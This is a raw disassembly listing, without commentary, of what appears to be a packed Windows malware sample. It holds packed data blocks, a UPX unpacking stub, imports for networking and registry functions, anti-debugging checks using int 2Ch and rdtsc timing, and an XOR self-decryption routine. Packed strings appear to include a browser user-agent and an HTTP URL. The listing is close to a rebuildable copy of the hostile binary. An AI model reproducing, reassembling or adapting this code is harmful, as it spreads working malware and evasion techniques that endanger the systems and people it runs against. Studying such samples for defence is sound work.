		dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
		dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
		dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h,	415C0376h
		dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
		dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
		dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
		dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
		dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
		dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
		dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
		dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
		dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
		dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
		dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
		dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
		dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
		dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
		dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
		dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
		dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
		dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
		dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h,	0B02B39DFh
		dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
		dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h,	838506Ah
		dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
		dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
		dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
		dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
		dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh,	968160C8h
		dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
		dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
		dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
		dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h,	25270055h
		dd 5ACE5903h, 40C520Ah,	9262CF20h, 28AF5D0Ch, 89E2B701h
		dd 21DE53C3h, 948E694Eh
		dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h,	281D146Ch
		dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h,	0CF203BD0h
		dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh,	4804C1FEh
		dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
		dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch,	0D91B1C8h
		dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
		dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
		dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
		dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
		dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h,	8BB38163h
		dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
		dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h,	0E26EE66h
		dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
		dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
		dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
		dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
		dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
		dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
		dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
		dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah,	0B6413BBBh
		dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
		dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
		dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
		dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
		dd 1B1FDBEh, 2BEC7317h,	0CC48BC8h, 88BE18Bh, 0B5B236EAh
		dd 4353A302h, 45055C64h, 58363605h, 0A2000049h,	0F1022C02h
		dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh,	0F501018Fh
		dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
		dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh,	843994FFh
		dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
		dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
		dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h,	6E695709h
		dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh,	8EE434h
		dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
		dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
		dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
		dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
		dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
		dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
		dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh,	0BEF6FD47h
		dd 276266Dh, 76742E7Ah,	6F74111Bh, 856E2E70h, 178C2D80h
		dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
		dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
		dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
		dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h,	0F6EDF862h
		dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
		dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h,	4E4D4C4Bh
		dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h,	74746823h
		dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
		dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
		dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
		dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
		dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
		dd 46302C06h, 7889934h,	0EBEDE247h, 0E8342FF7h,	7EDAE80Ah
		dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
		dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
		dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh,	0F931C96h
		dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h,	0F19DF3EDh
		dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
		dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
		dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h,	0ED6F6D9Fh
		dd 0C850B2h, 57DC1499h,	4E122555h, 0DFECC0A4h, 1291EDDEh
		dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
		dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
		dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
		dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
		dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h,	5F37F776h
		dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
		dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
		dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h,	0BEB78190h
		dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh,	0A95D914h
		dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
		dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah,	0DB9BAB9Eh
		dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
		dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
		dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh,	0BB6F6EDBh
		dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
		dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
		dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h,	31204D41h
		dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh,	0B75BB696h
		dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
		dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
		dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
		dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
		dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h,	5EDEC874h
		dd 901306Ch, 3500398Ch,	0DCC06C23h, 72E1D96h, 32ABDA00h
		dd 889CF20h, 3B57DA20h,	9F4C9383h, 46F20003h, 0C1901E23h
		dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h,	48E088h
		dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
		dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
		dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
		dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
		dd 6DFF20F6h, 0FF1640h,	0E00DEDEh, 19F1600h, 9BF2602h
		dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
		dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh,	5D6DCF54h
		dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
		dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh,	0B10C3919h
		dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
		dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
		dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
		dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
		dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
		dd 2FE409CFh, 230EFEFFh
		dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h,	0B801FFEEh
		dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h,	700118D8h
		dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
		dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
		dd 0C0A6DB20h, 7250CAh,	39014446h, 3C844FC9h, 123C6B32h
		dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
		dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h,	0E4FF071Ch
		dd 44655300h, 67756265h, 0FA377669h, 67853518h,	6A6441A7h
		dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h,	0BF6D7075h
		dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
		dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
		dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
		dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h,	284158DBh
		dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h,	48F46897h
		dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h,	9F4B010Ah
		dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
		dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h,	8EA9EE2Fh
		dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
		dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
		dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
		dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
		dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h,	909A3233h
		dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
		dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
		dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
		dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h,	7264736Eh
		dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
		dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
		dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
		dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
		dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h,	6D1B1358h
		dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
		dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
		dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
		dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h,	978A5F87h
		dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh,	0A956372h
		dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
		dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
		dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
		dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
		dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h,	0D9B9E144h
		dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h,	0C646E61h
		dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h,	0A3449711h
		dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h,	6509530Fh
		dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
		dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h,	4C0B111Dh
		dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h,	0D5CB080Bh
		dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h,	0E94D8AD8h
		dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h,	78455A62h
		dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h,	87B591Bh
		dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h,	0D160C3FCh
		dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
		dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
		dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h,	1AC13F86h
		dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
		dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh,	6F112C79h
		dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
		dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
		dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
		dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
		dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
		dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h,	4166B105h
		dd 9C62834Fh, 424F466h,	0DB616C5Ah, 9B558543h, 370E1141h
		dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
		dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
		dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h,	455036AAh
		dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
		dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh,	0B7334A02h
		dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
		dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
		dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
		dd 48C016h, 81434BE0h, 54C32Fh,	2 dup(0)
		db 90h
		db 0FFh, 2 dup(0)
		align 10h
		pusha
		mov	esi, offset dword_31426000
		lea	edi, [esi-5000h]
		push	edi
		or	ebp, 0FFFFFFFFh
		jmp	short loc_31427BD2
; ---------------------------------------------------------------------------
		align 8


loc_31427BC8:				; CODE XREF: UPX1:loc_31427BD9j
		mov	al, [esi]
		inc	esi
		mov	[edi], al
		inc	edi


loc_31427BCE:				; CODE XREF: UPX1:31427C66j
					; UPX1:31427C7Dj
		add	ebx, ebx
		jnz	short loc_31427BD9


loc_31427BD2:				; CODE XREF: UPX1:31427BC0j
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427BD9:				; CODE XREF: UPX1:31427BD0j
		jb	short loc_31427BC8
		mov	eax, 1


loc_31427BE0:				; CODE XREF: UPX1:31427BEFj
					; UPX1:31427BFAj
		add	ebx, ebx
		jnz	short loc_31427BEB
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427BEB:				; CODE XREF: UPX1:31427BE2j
		adc	eax, eax
		add	ebx, ebx
		jnb	short loc_31427BE0
		jnz	short loc_31427BFC
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_31427BE0


loc_31427BFC:				; CODE XREF: UPX1:31427BF1j
		xor	ecx, ecx
		sub	eax, 3
		jb	short loc_31427C10
		shl	eax, 8
		mov	al, [esi]
		inc	esi
		xor	eax, 0FFFFFFFFh
		jz	short loc_31427C82
		mov	ebp, eax


loc_31427C10:				; CODE XREF: UPX1:31427C01j
		add	ebx, ebx
		jnz	short loc_31427C1B
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427C1B:				; CODE XREF: UPX1:31427C12j
		adc	ecx, ecx
		add	ebx, ebx
		jnz	short loc_31427C28
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427C28:				; CODE XREF: UPX1:31427C1Fj
		adc	ecx, ecx
		jnz	short loc_31427C4C
		inc	ecx


loc_31427C2D:				; CODE XREF: UPX1:31427C3Cj
					; UPX1:31427C47j
		add	ebx, ebx
		jnz	short loc_31427C38
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_31427C38:				; CODE XREF: UPX1:31427C2Fj
		adc	ecx, ecx
		add	ebx, ebx
		jnb	short loc_31427C2D
		jnz	short loc_31427C49
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_31427C2D


loc_31427C49:				; CODE XREF: UPX1:31427C3Ej
		add	ecx, 2


loc_31427C4C:				; CODE XREF: UPX1:31427C2Aj
		cmp	ebp, 0FFFFF300h
		adc	ecx, 1
		lea	edx, [edi+ebp]
		cmp	ebp, 0FFFFFFFCh
		jbe	short loc_31427C6C


loc_31427C5D:				; CODE XREF: UPX1:31427C64j
		mov	al, [edx]
		inc	edx
		mov	[edi], al
		inc	edi
		dec	ecx
		jnz	short loc_31427C5D
		jmp	loc_31427BCE
; ---------------------------------------------------------------------------
		align 4


loc_31427C6C:				; CODE XREF: UPX1:31427C5Bj
					; UPX1:31427C79j
		mov	eax, [edx]
		add	edx, 4
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 4
		ja	short loc_31427C6C
		add	edi, ecx
		jmp	loc_31427BCE
; ---------------------------------------------------------------------------


loc_31427C82:				; CODE XREF: UPX1:31427C0Cj
		pop	esi
		mov	edi, esi
		mov	ecx, 7Eh


loc_31427C8A:				; CODE XREF: UPX1:31427C91j
					; UPX1:31427C96j
		mov	al, [edi]
		inc	edi
		sub	al, 0E8h


loc_31427C8F:				; CODE XREF: UPX1:31427CB4j
		cmp	al, 1
		ja	short loc_31427C8A
		cmp	byte ptr [edi],	1
		jnz	short loc_31427C8A
		mov	eax, [edi]
		mov	bl, [edi+4]
		shr	ax, 8
		rol	eax, 10h
		xchg	al, ah
		sub	eax, edi
		sub	bl, 0E8h
		add	eax, esi
		mov	[edi], eax
		add	edi, 5
		mov	eax, ebx
		loop	loc_31427C8F
		lea	edi, [esi+5000h]


loc_31427CBC:				; CODE XREF: UPX1:31427CDEj
		mov	eax, [edi]
		or	eax, eax
		jz	short loc_31427D07
		mov	ebx, [edi+4]
		lea	eax, [eax+esi+7000h]
		add	ebx, esi
		push	eax
		add	edi, 8
		call	dword ptr [esi+708Ch]
		xchg	eax, ebp


loc_31427CD9:				; CODE XREF: UPX1:31427CFFj
		mov	al, [edi]
		inc	edi
		or	al, al
		jz	short loc_31427CBC
		mov	ecx, edi
		jns	short near ptr loc_31427CEA+1
		movzx	eax, word ptr [edi]
		inc	edi
		push	eax
		inc	edi


loc_31427CEA:				; CODE XREF: UPX1:31427CE2j
		mov	ecx, 0AEF24857h
		push	ebp
		call	dword ptr [esi+7090h]
		or	eax, eax
		jz	short loc_31427D01
		mov	[ebx], eax
		add	ebx, 4
		jmp	short loc_31427CD9
; ---------------------------------------------------------------------------


loc_31427D01:				; CODE XREF: UPX1:31427CF8j
		call	dword ptr [esi+7094h]


loc_31427D07:				; CODE XREF: UPX1:31427CC0j
		popa
		jmp	loc_31422334
; ---------------------------------------------------------------------------
		align 400h
UPX1		ends

; Section 3. (virtual address 00008000)
; Virtual size			: 00018000 (  98304.)
; Section size in file		: 00018000 (  98304.)
; Offset to raw	data for section: 00008000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX2		segment	para public 'CODE' use32
		assume cs:UPX2
		;org 31428000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
		dd 3 dup(0)
		dd 80C4h, 808Ch, 3 dup(0)
		dd 80D1h, 809Ch, 3 dup(0)
		dd 80DEh, 80A4h, 3 dup(0)
		dd 80E9h, 80ACh, 3 dup(0)
		dd 80F4h, 80B4h, 3 dup(0)
		dd 8100h, 80BCh, 5 dup(0)
		dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
		dd 77DD6BF0h, 0
		dd 77C371D3h, 0
		dd 7E41A8ADh, 0
		dd 42C2C8A1h, 0
		dd 71AB9639h, 0
		dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
		dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
		dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
		dd 642E3233h, 6C6Ch, 64616F4Ch,	7262694Ch, 41797261h, 65470000h
		dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
		dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
		dd 646Eh, 72707377h, 66746E69h,	41h, 65746E49h,	74656E72h
		dd 6E65704Fh, 41h, 26h dup(0)
		dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
		dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
		dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
		dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
		dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h,	64C02BC3h
		dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
		dd 1E00h, 78h, 75Dh dup(0)

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near
		nop
		call	loc_3142A02D
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3142A006	proc near		; CODE XREF: UPX2:3142A07Dp
		push	ebx
		mov	ecx, 0CBFh
		mov	ebx, edx


loc_3142A00E:				; CODE XREF: sub_3142A006+13j
		xor	[eax], dx
		lea	edx, [ebx+edx]
		xchg	dl, dh
		lea	eax, [eax+2]
		loop	loc_3142A00E
		pop	ebx
		retn
sub_3142A006	endp

; ---------------------------------------------------------------------------


loc_3142A01D:				; CODE XREF: UPX2:3142A068j
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		db 0E3h
		db 3Eh

; =============== S U B	R O U T	I N E =======================================



sub_3142A021	proc near		; CODE XREF: UPX2:loc_3142A047p
					; UPX2:3142A04Dp
		rdtsc
		retn
sub_3142A021	endp

; ---------------------------------------------------------------------------


loc_3142A024:				; CODE XREF: UPX2:3142A035j
					; UPX2:3142A03Fj ...
		mov	eax, 1000h
		xor	ecx, ecx
		jmp	short loc_3142A052
; ---------------------------------------------------------------------------


loc_3142A02D:				; CODE XREF: start+1p
		test	eax, eax
		jnz	short loc_3142A039
		int	2Ch		; Internal routine for MSDOS (IRET)
		test	eax, eax
		jns	short loc_3142A024
		jmp	short loc_3142A047
; ---------------------------------------------------------------------------


loc_3142A039:				; CODE XREF: UPX2:3142A02Fj
		mov	dx, cs
		shl	ebx, 0Ah
		js	short loc_3142A024
		jnb	short loc_3142A024
		cmp	dh, bh
		jz	short loc_3142A024


loc_3142A047:				; CODE XREF: UPX2:3142A037j
		call	sub_3142A021
		xchg	eax, ecx
		call	sub_3142A021


loc_3142A052:				; CODE XREF: UPX2:3142A02Bj
		neg	ecx
		push	ebp
		add	eax, ecx	; CODE XREF: UPX2:3142A09Bj
		mov	ebp, [esp+4]
		sub	dword ptr [esp+4], 1E06h
		sub	eax, 100h
		jnb	short loc_3142A01D
		sub	ebp, 301006h
		lea	eax, [ebp+301082h] ; CODE XREF:	UPX2:3142A0D5j
		mov	dx, [eax-63h]
		call	sub_3142A006
		or	[esi], bh
		neg	byte ptr [edx+0B1F6821h]
		daa
		jno	short near ptr loc_3142A0CB+1
		cmc
		das
		and	bl, cl
		popa
		xor	[ecx-189830F4h], esi
		outs	dx, dword ptr ss:[esi]
		scasb
		loop	near ptr loc_3142A055+1
		sbb	dl, [ebx-15181EE9h]
		xor	eax, 0E40EC101h
		out	0EFh, eax
		mov	ebp, 5B48EFE2h
		inc	ecx
		pop	esp
		mov	edx, 3E15D706h
		ficom	dword ptr [edx-54AF5AFh]
		movsb
		stc
		db	36h
		pusha
		xchg	bh, ds:0C09675FEh
		test	al, 0Fh
		cwde
		lea	edi, [edi]


loc_3142A0CB:				; CODE XREF: UPX2:3142A08Bj
		add	dword ptr [edi-48316BD5h], 4Eh
